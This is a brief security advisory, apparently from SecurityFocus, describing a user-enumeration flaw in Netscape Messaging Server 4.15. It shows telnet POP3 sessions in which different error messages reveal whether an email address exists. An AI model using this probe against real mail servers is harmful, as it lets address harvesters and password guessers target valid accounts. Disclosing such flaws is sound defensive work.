Netscape Messaging Server Email Address Verification Vulnerability

If an invalid password is entered for a valid email address while attempting to connect to Netscape Messaging Server, an error message stating that the password is incorrect will be displayed. However, when entering an invalid email address, the error message returned will state that the specified email address is an invalid mailbox. Due to the differing error messages, it is possible for email address harvesters to acquire lists of valid email addresses.

Below is an example of the discrepancy between both error messages:

[user@ ~]$ telnet target 110
Trying target...
Connected target (target).
Escape character is '^]'.
+OK target POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
USER test.user
+OK Name is a valid mailbox
PASS password
-ERR Password incorrect
quit
+OK
Connection closed by foreign host.

[user@ ~]$ telnet target 110
Trying target...
Connected to target (target).
Escape character is '^]'.
+OK target POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
user invalid.user
+OK Name is a valid mailbox
PASS password
-ERR User unknown
quit
+OK
Connection closed by foreign host.


 

Privacy Statement
Copyright 2010, SecurityFocus